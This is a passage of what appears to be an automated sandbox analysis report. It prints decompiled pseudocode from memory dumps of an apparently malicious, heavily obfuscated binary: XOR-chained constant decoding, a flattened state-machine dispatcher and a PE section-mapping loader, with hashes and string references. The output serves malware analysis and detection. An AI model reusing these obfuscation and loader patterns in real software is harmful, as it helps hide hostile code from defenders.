				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
				 *(_t380 + 0x94) = 0x420b;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
				 *(_t380 + 0x24) = 0x5d05;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
				 *(_t380 + 0x78) = 0xceba;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
				 *(_t380 + 0x1c) = 0x6278;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
				 *(_t380 + 0x18) = 0x457c;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
				 *(_t380 + 0x4c) = 0x48c4;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
				 *(_t380 + 0x64) = 0xb936;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
				 *(_t380 + 0x20) = 0xcbd2;
				_t373 = 0x7c;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
				 *(_t380 + 0x6c) = 0x94d3;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
				 *(_t380 + 0x90) = 0xca42;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
				 *(_t380 + 0x3c) = 0x3a85;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
				 *(_t380 + 0x74) = 0xaf39;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
				 *(_t380 + 0x84) = 0x7bfe;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
				 *(_t380 + 0x88) = 0xbca6;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
				 *(_t380 + 0x7c) = 0x7bcd;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
				 *(_t380 + 0x8c) = 0x5f89;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
				 *(_t380 + 0x2c) = 0x86b9;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
				 *(_t380 + 0x50) = 0x2126;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
				 *(_t380 + 0x80) = 0xf6ec;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
				 *(_t380 + 0x60) = 0x3ac6;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
				 *(_t380 + 0x30) = 0x4848;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
				 *(_t380 + 0x34) = 0xf09c;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
				_t374 = 0x28650a76;
				_t368 =  *((intOrPtr*)(_t380 + 0x98));
				_t334 =  *((intOrPtr*)(_t380 + 0x98));
				_t378 =  *((intOrPtr*)(_t380 + 0x98));
				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
				while(_t336 != 0xd3df7e1) {
					if(_t336 == 0x132cc48f) {
						E0021F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
						_t336 = 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x159b7bb7) {
						_push(_t336);
						_push(_t336);
						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
						_t368 = E00218736(0x1000);
						__eflags = _t368;
						_t336 =  !=  ? _t374 : 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x18c2a499) {
						_t319 = E0021B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
						_t334 = _t319;
						_t380 = _t380 + 0x30;
						__eflags = _t319 - 0xffffffff;
						if(__eflags == 0) {
							L29:
							__eflags = 0;
							return 0;
						}
						_t336 = 0x159b7bb7;
						continue;
					}
					if(_t336 == 0x1a0fbde3) {
						E00223E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
						_t322 = E002128CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
						_t378 = _t322;
						_t380 = _t380 + 0xc;
						_t336 = 0x18c2a499;
						 *((short*)(_t322 - 2)) = 0;
						continue;
					}
					if(_t336 == 0x262df760) {
						_t336 = 0x1a0fbde3;
						continue;
					}
					if(_t336 != _t374) {
						L28:
						__eflags = _t336 - 0x1c26cb40;
						if(__eflags != 0) {
							continue;
						}
						goto L29;
					}
					_t325 = E00226319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
					_t380 = _t380 + 0x30;
					if(_t325 == 0) {
						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
						L18:
						__eflags = _t326;
						if(__eflags == 0) {
							_t336 = _t374;
						} else {
							_t327 =  *0x22ca30; // 0x0
							E00228A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
							_t380 = _t380 + 0xc;
							_t336 = 0x132cc48f;
						}
						continue;
					}
					_t376 = _t368;
					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00218624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
						_t329 =  *_t376;
						if(_t329 == 0) {
							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
							L17:
							_t374 = 0x28650a76;
							goto L18;
						}
						_t376 = _t376 + _t329;
					}
					_t326 = 1;
					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
					goto L17;
				}
				E00224F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
				_t336 = 0x1c26cb40;
				goto L28;
			}

0x0021e37d
0x0021e38a
0x0021e393
0x0021e39a
0x0021e39f
0x0021e3a7
0x0021e3ac
0x0021e3b4
0x0021e3bc
0x0021e3c4
0x0021e3c9
0x0021e3d1
0x0021e3d6
0x0021e3de
0x0021e3e6
0x0021e3f6
0x0021e401
0x0021e404
0x0021e408
0x0021e410
0x0021e418
0x0021e41d
0x0021e425
0x0021e42d
0x0021e435
0x0021e43d
0x0021e442
0x0021e44a
0x0021e452
0x0021e45a
0x0021e467
0x0021e46b
0x0021e473
0x0021e47b
0x0021e483
0x0021e48b
0x0021e493
0x0021e49b
0x0021e4a8
0x0021e4ac
0x0021e4b4
0x0021e4c4
0x0021e4c8
0x0021e4d0
0x0021e4d8
0x0021e4e0
0x0021e4e8
0x0021e4f0
0x0021e4f8
0x0021e500
0x0021e505
0x0021e50d
0x0021e515
0x0021e521
0x0021e524
0x0021e528
0x0021e530
0x0021e53b
0x0021e546
0x0021e551
0x0021e559
0x0021e55e
0x0021e563
0x0021e56b
0x0021e573
0x0021e57d
0x0021e582
0x0021e58a
0x0021e592
0x0021e597
0x0021e59f
0x0021e5a7
0x0021e5af
0x0021e5b7
0x0021e5bf
0x0021e5c7
0x0021e5cf
0x0021e5d7
0x0021e5df
0x0021e5e7
0x0021e5ef
0x0021e5f7
0x0021e5ff
0x0021e607
0x0021e60f
0x0021e61e
0x0021e61f
0x0021e629
0x0021e62d
0x0021e635
0x0021e63d
0x0021e645
0x0021e64d
0x0021e655
0x0021e668
0x0021e66f
0x0021e67a
0x0021e682
0x0021e68a
0x0021e68f
0x0021e697
0x0021e69f
0x0021e6a4
0x0021e6ac
0x0021e6bf
0x0021e6c6
0x0021e6d1
0x0021e6dc
0x0021e6e7
0x0021e6f2
0x0021e6fa
0x0021e6ff
0x0021e707
0x0021e712
0x0021e71d
0x0021e728
0x0021e730
0x0021e738
0x0021e73d
0x0021e742
0x0021e74a
0x0021e752
0x0021e75a
0x0021e75f
0x0021e767
0x0021e77a
0x0021e781
0x0021e78c
0x0021e799
0x0021e79d
0x0021e7a5
0x0021e7ad
0x0021e7b5
0x0021e7bd
0x0021e7c5
0x0021e7cd
0x0021e7d5
0x0021e7da
0x0021e7e4
0x0021e7eb
0x0021e7f2
0x0021e7f9
0x0021e7fd
0x0021e805
0x0021e817
0x0021ea0c
0x0021ea13
0x00000000
0x0021ea13
0x0021e823
0x0021e9d2
0x0021e9d3
0x0021e9d9
0x0021e9ea
0x0021e9ed
0x0021e9f4
0x00000000
0x0021e9f4
0x0021e82f
0x0021e9a9
0x0021e9ae
0x0021e9b0
0x0021e9b3
0x0021e9b6
0x0021ea3d
0x0021ea40
0x0021ea49
0x0021ea49
0x0021e9bc
0x00000000
0x0021e9bc
0x0021e83b
0x0021e93e
0x0021e952
0x0021e957
0x0021e959
0x0021e95e
0x0021e963
0x00000000
0x0021e963
0x0021e847
0x0021e925
0x00000000
0x0021e925
0x0021e84f
0x0021ea31
0x0021ea31
0x0021ea37
0x00000000
0x00000000
0x00000000
0x0021ea37
0x0021e88c
0x0021e891
0x0021e896
0x0021e8cf
0x0021e8e4
0x0021e8e4
0x0021e8e6
0x0021e91e
0x0021e8e8
0x0021e8ef
0x0021e90c
0x0021e911
0x0021e914
0x0021e914
0x00000000
0x0021e8e6
0x0021e898
0x0021e89a
0x0021e8b9
0x0021e8bd
0x0021e8d8
0x0021e8df
0x0021e8df
0x00000000
0x0021e8df
0x0021e8bf
0x0021e8bf
0x0021e8c5
0x0021e8c6
0x00000000
0x0021e8c6
0x0021ea26
0x0021ea2c
0x00000000

Strings

ve(, xrefs: 0021E7DA
?, xrefs: 0021E6E7
o, xrefs: 0021E712
^, xrefs: 0021E59F
h|, xrefs: 0021E483
w]4S, xrefs: 0021E56B
ve(, xrefs: 0021E8DF
M:, xrefs: 0021E505
|E, xrefs: 0021E5AF
n`, xrefs: 0021E44A
HH, xrefs: 0021E7AD
&!, xrefs: 0021E74A

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
API String ID: 823142352-1348462970
Opcode ID: e76646b607c87cd1e75b4373d7cec81b5f134b982ed994b4333877ea2a86879c
Instruction ID: 6c891df15012636f88a11aa3ec1cba5e7bba367d8ee835bfb52c002fff8fe5db
Opcode Fuzzy Hash: e76646b607c87cd1e75b4373d7cec81b5f134b982ed994b4333877ea2a86879c
Instruction Fuzzy Hash: 0AF153711183819FE768CF25C54AA9BBBF1BBD4708F108A1DF5DA862A0D7B58949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00226DB9, Relevance: 15.2, Strings: 12, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00226DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t224;
				void* _t243;
				void* _t256;
				void* _t264;
				void* _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				void* _t298;
				signed int* _t301;
				signed int* _t302;
				signed int* _t303;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(3);
				_push(__ecx);
				E0021602B(_t224);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x15bbba;
				_v72 = 0x7e44;
				_t290 = 0x3e;
				_v72 = _v72 * 0x56;
				_v72 = _v72 | 0xe97810d5;
				_v72 = _v72 ^ 0xe97a6add;
				_v56 = 0x50ea;
				_v56 = _v56 >> 9;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x00008000;
				_v100 = 0x7422;
				_v100 = _v100 + 0xffff8791;
				_v100 = _v100 ^ 0x724a15f0;
				_v100 = _v100 + 0xd05;
				_v100 = _v100 ^ 0x8db5db48;
				_v48 = 0x2edd;
				_v48 = _v48 / _t290;
				_v48 = _v48 ^ 0x00005532;
				_v76 = 0xee3f;
				_v76 = _v76 + 0xffffe6cd;
				_v76 = _v76 + 0xffff5ce1;
				_v76 = _v76 ^ 0x00006965;
				_v104 = 0xa36d;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0x5d19;
				_v104 = _v104 >> 1;
				_v104 = _v104 ^ 0x051bebf0;
				_v52 = 0xa852;
				_v52 = _v52 + 0xddb7;
				_v52 = _v52 ^ 0x00019bba;
				_v96 = 0xa4e6;
				_v96 = _v96 | 0xa6d42a45;
				_t291 = 0x2e;
				_v96 = _v96 * 0x22;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x507e3c16;
				_v40 = 0x2ce2;
				_v40 = _v40 + 0xffffe435;
				_v40 = _v40 ^ 0x00002c9b;
				_v64 = 0xad5e;
				_v64 = _v64 * 0xd;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00006dfc;
				_v68 = 0x15e2;
				_v68 = _v68 << 4;
				_v68 = _v68 + 0x971e;
				_v68 = _v68 ^ 0x0001ffd3;
				_v28 = 0x5912;
				_v28 = _v28 | 0xb77a8e9e;
				_v28 = _v28 ^ 0xb77a927a;
				_v32 = 0xb0a1;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x000014c1;
				_v36 = 0x1527;
				_v36 = _v36 / _t291;
				_v36 = _v36 ^ 0x000058cb;
				_v92 = 0x32e5;
				_v92 = _v92 * 0x31;
				_v92 = _v92 + 0xffff00ec;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x08be8a0d;
				_v20 = 0xbd6f;
				_v20 = _v20 + 0xab45;
				_v20 = _v20 ^ 0x000148c7;
				_v24 = 0x6d6f;
				_t292 = 0x6d;
				_v24 = _v24 / _t292;
				_v24 = _v24 ^ 0x00002132;
				_v84 = 0xac46;
				_t293 = 0x2f;
				_v84 = _v84 * 0x6c;
				_v84 = _v84 + 0xe89f;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0x0000aacf;
				_v88 = 0x7aeb;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 >> 0xb;
				_t294 = 0x7f;
				_v88 = _v88 / _t293;
				_v88 = _v88 ^ 0x00001cd5;
				_v60 = 0x8b82;
				_v60 = _v60 + 0xffffb5bd;
				_v60 = _v60 * 0x35;
				_v60 = _v60 ^ 0x000df53e;
				_v12 = 0x733f;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000065d0;
				_v16 = 0x6f84;
				_v16 = _v16 | 0x29e4272c;
				_v16 = _v16 ^ 0x29e452e1;
				_v80 = 0x4249;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 / _t294;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00004a04;
				_v44 = 0x4ba5;
				_v44 = _v44 + 0xffffabaf;
				_v44 = _v44 ^ 0xfffff714;
				_t243 = E00223811(__ecx, _v48, _a8, _v76, _v104, _v52);
				_t256 = _t243;
				_t301 =  &(( &_v104)[0xb]);
				if(_t256 == 0) {
					return _t243;
				}
				_t295 = E00217EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
				_t302 =  &(_t301[6]);
				if(_t295 == 0) {
					L7:
					return _t295;
				}
				E00222674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
				_t303 =  &(_t302[5]);
				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
				while(_t288 < _t298) {
					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
					E00222674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
					_t303 =  &(_t303[5]);
					_t288 = _t288 + 0x28;
				}
				E0021F7D8(_t295, _t256);
				_t264 = _t295;
				if(E0021E05A(_t264, _t256) == 0) {
					_push(_t264);
					E00224FE8(_v56, _t295, _v60, _v12, _v16, _v80);
					_t295 = 0;
				}
				goto L7;
			}

0x00226dbe
0x00226dc5
0x00226dcc
0x00226dd3
0x00226dda
0x00226ddc
0x00226dde
0x00226ddf
0x00226de4
0x00226dee
0x00226df9
0x00226e08
0x00226e0b
0x00226e0f
0x00226e17
0x00226e1f
0x00226e27
0x00226e2c
0x00226e31
0x00226e39
0x00226e41
0x00226e49
0x00226e51
0x00226e59
0x00226e61
0x00226e71
0x00226e75
0x00226e7d
0x00226e85
0x00226e8d
0x00226e95
0x00226e9d
0x00226ea5
0x00226eaa
0x00226eb2
0x00226eb6
0x00226ebe
0x00226ec6
0x00226ece
0x00226ed6
0x00226ede
0x00226eeb
0x00226eec
0x00226ef0
0x00226ef4
0x00226efc
0x00226f04
0x00226f0c
0x00226f14
0x00226f21
0x00226f25
0x00226f2a
0x00226f32
0x00226f3a
0x00226f3f
0x00226f47
0x00226f4f
0x00226f57
0x00226f5f
0x00226f67
0x00226f6f
0x00226f74
0x00226f7c
0x00226f8a
0x00226f8e
0x00226f96
0x00226fa3
0x00226fa7
0x00226fb1
0x00226fb6
0x00226fbe
0x00226fc6
0x00226fce
0x00226fd6
0x00226fe4
0x00226fe9
0x00226fef
0x00226ff7
0x00227004
0x00227007
0x0022700b
0x00227013
0x00227018
0x00227020
0x0022702d
0x00227031
0x0022703c
0x0022703d
0x00227043
0x0022704b
0x00227053
0x00227060
0x00227064
0x0022706c
0x00227077
0x0022707f
0x0022708a
0x00227092
0x0022709a
0x002270a2
0x002270aa
0x002270b5
0x002270b9
0x002270be
0x002270c6
0x002270ce
0x002270d6
0x002270f5
0x002270fa
0x002270fc
0x00227101
0x002271ee
0x002271ee
0x0022712d
0x0022712f
0x00227134
0x002271e7
0x00000000
0x002271e7
0x00227157
0x00227160
0x0022716d
0x0022716f
0x002271aa
0x0022718d
0x0022719f
0x002271a4
0x002271a7
0x002271a7
0x002271b2
0x002271b9
0x002271c4
0x002271c6
0x002271dd
0x002271e5
0x002271e5
0x00000000

Strings

"t, xrefs: 00226E39
z, xrefs: 00227020
R), xrefs: 0022709A
,, xrefs: 00226EFC
ei, xrefs: 00226E95
2, xrefs: 00226F96
P, xrefs: 00226E1F
?s, xrefs: 0022706C
om, xrefs: 00226FD6
2U, xrefs: 00226E75
2!, xrefs: 00226FEF
IB, xrefs: 002270A2

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
API String ID: 0-3377435326
Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction ID: 19e17fb78e9b8aca2b669db0ba8907b05d9e8dd186dd1709a8e65a833c5c9e92
Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction Fuzzy Hash: 23B13272518780AFE364CF65C88A94BFBF1BBC4358F508A1CF695862A0C7B9C559CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00216D9F, Relevance: 14.1, Strings: 11, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00216D9F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t365;
				void* _t366;
				intOrPtr _t368;
				signed int _t376;
				intOrPtr* _t378;
				void* _t379;
				signed int _t384;
				intOrPtr _t385;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t399;
				void* _t405;
				intOrPtr _t419;
				void* _t427;
				signed int* _t432;

				_t432 =  &_v1216;
				_v1048 = 0x446f36;
				_v1044 = 0;
				_v1168 = 0x4c2;
				_v1168 = _v1168 + 0x4422;
				_v1168 = _v1168 << 0xe;
				_v1168 = _v1168 ^ 0x12390029;
				_v1108 = 0xe6e3;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 ^ 0x80737181;
				_v1140 = 0x5a14;
				_v1140 = _v1140 + 0xffff6ad9;
				_v1140 = _v1140 + 0x3f04;
				_v1140 = _v1140 ^ 0x000003f3;
				_v1152 = 0xde22;
				_v1056 = 0;
				_t427 = 0x1cf5a099;
				_t387 = 0xc;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0x1888;
				_v1152 = _v1152 ^ 0x00005d3c;
				_v1072 = 0x75ae;
				_t388 = 0x55;
				_v1072 = _v1072 * 0x39;
				_v1072 = _v1072 ^ 0x001a1469;
				_v1160 = 0x6360;
				_v1160 = _v1160 << 0xa;
				_v1160 = _v1160 >> 0xe;
				_v1160 = _v1160 ^ 0x00005ec5;
				_v1204 = 0x5583;
				_v1204 = _v1204 ^ 0x85366cb5;
				_v1204 = _v1204 | 0x8d22480f;
				_v1204 = _v1204 + 0xffffa345;
				_v1204 = _v1204 ^ 0x8d362c42;
				_v1076 = 0x4501;
				_v1076 = _v1076 ^ 0x7eb858e4;
				_v1076 = _v1076 ^ 0x7eb84390;
				_v1176 = 0x178a;
				_v1176 = _v1176 >> 0xe;
				_v1176 = _v1176 * 0xb;
				_v1176 = _v1176 ^ 0x00005407;
				_v1196 = 0x1155;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x99db21f3;
				_v1196 = _v1196 << 8;
				_v1196 = _v1196 ^ 0x8e21cf72;
				_v1096 = 0x9447;
				_v1096 = _v1096 + 0xfffff759;
				_v1096 = _v1096 ^ 0x0000f307;
				_v1136 = 0x5f84;
				_v1136 = _v1136 | 0xcddc780f;
				_v1136 = _v1136 >> 5;
				_v1136 = _v1136 ^ 0x066ef8af;
				_v1104 = 0x8d89;
				_v1104 = _v1104 + 0xffff49e8;
				_v1104 = _v1104 ^ 0xffff9178;
				_v1060 = 0xefb9;
				_v1060 = _v1060 + 0xc1e0;
				_v1060 = _v1060 ^ 0x0001802f;
				_v1088 = 0x4e92;
				_v1088 = _v1088 / _t388;
				_v1088 = _v1088 ^ 0x00003d65;
				_v1180 = 0x8957;
				_v1180 = _v1180 ^ 0x92844c79;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 + 0x6937;
				_v1180 = _v1180 ^ 0x0004ca08;
				_v1188 = 0xa977;
				_v1188 = _v1188 + 0xffff4939;
				_t389 = 0x2a;
				_v1188 = _v1188 / _t389;
				_v1188 = _v1188 + 0xff8b;
				_v1188 = _v1188 ^ 0x06195dc5;
				_v1184 = 0xd80a;
				_v1184 = _v1184 << 0xd;
				_v1184 = _v1184 | 0x4fc46678;
				_v1184 = _v1184 + 0xffff2565;
				_v1184 = _v1184 ^ 0x5fc4ec42;
				_v1144 = 0xea63;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff7a6a;
				_v1144 = _v1144 ^ 0xffff3b56;
				_v1064 = 0xbe27;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x0be2654a;
				_v1100 = 0x1945;
				_v1100 = _v1100 ^ 0xac55a11c;
				_v1100 = _v1100 ^ 0xac55a0be;
				_v1156 = 0x9792;
				_v1156 = _v1156 << 3;
				_v1156 = _v1156 + 0xffff9949;
				_v1156 = _v1156 ^ 0x00042150;
				_v1124 = 0x4510;
				_v1124 = _v1124 + 0xffff8613;
				_v1124 = _v1124 | 0x934ed599;
				_v1124 = _v1124 ^ 0xffffb057;
				_v1208 = 0xd7d3;
				_t390 = 0x4a;
				_v1208 = _v1208 * 0x29;
				_v1208 = _v1208 << 7;
				_v1208 = _v1208 | 0x9b57b5c9;
				_v1208 = _v1208 ^ 0x9b5f9b7a;
				_v1164 = 0x3cc8;
				_v1164 = _v1164 + 0xffff7a64;
				_v1164 = _v1164 + 0xffff31bf;
				_v1164 = _v1164 ^ 0xfffea90e;
				_v1092 = 0xe652;
				_v1092 = _v1092 << 0xf;
				_v1092 = _v1092 ^ 0x732967ec;
				_v1200 = 0xc0e1;
				_v1200 = _v1200 ^ 0xc04a3a1a;
				_v1200 = _v1200 | 0x7efbebea;
				_v1200 = _v1200 ^ 0xfefb9216;
				_v1192 = 0x2d8c;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 ^ 0x302961fe;
				_v1192 = _v1192 << 0xf;
				_v1192 = _v1192 ^ 0xb0d2939c;
				_v1132 = 0xbcbe;
				_v1132 = _v1132 | 0x9a03aa26;
				_v1132 = _v1132 << 4;
				_v1132 = _v1132 ^ 0xa03bfed3;
				_v1068 = 0x5b9d;
				_v1068 = _v1068 / _t390;
				_v1068 = _v1068 ^ 0x00000144;
				_v1172 = 0x2743;
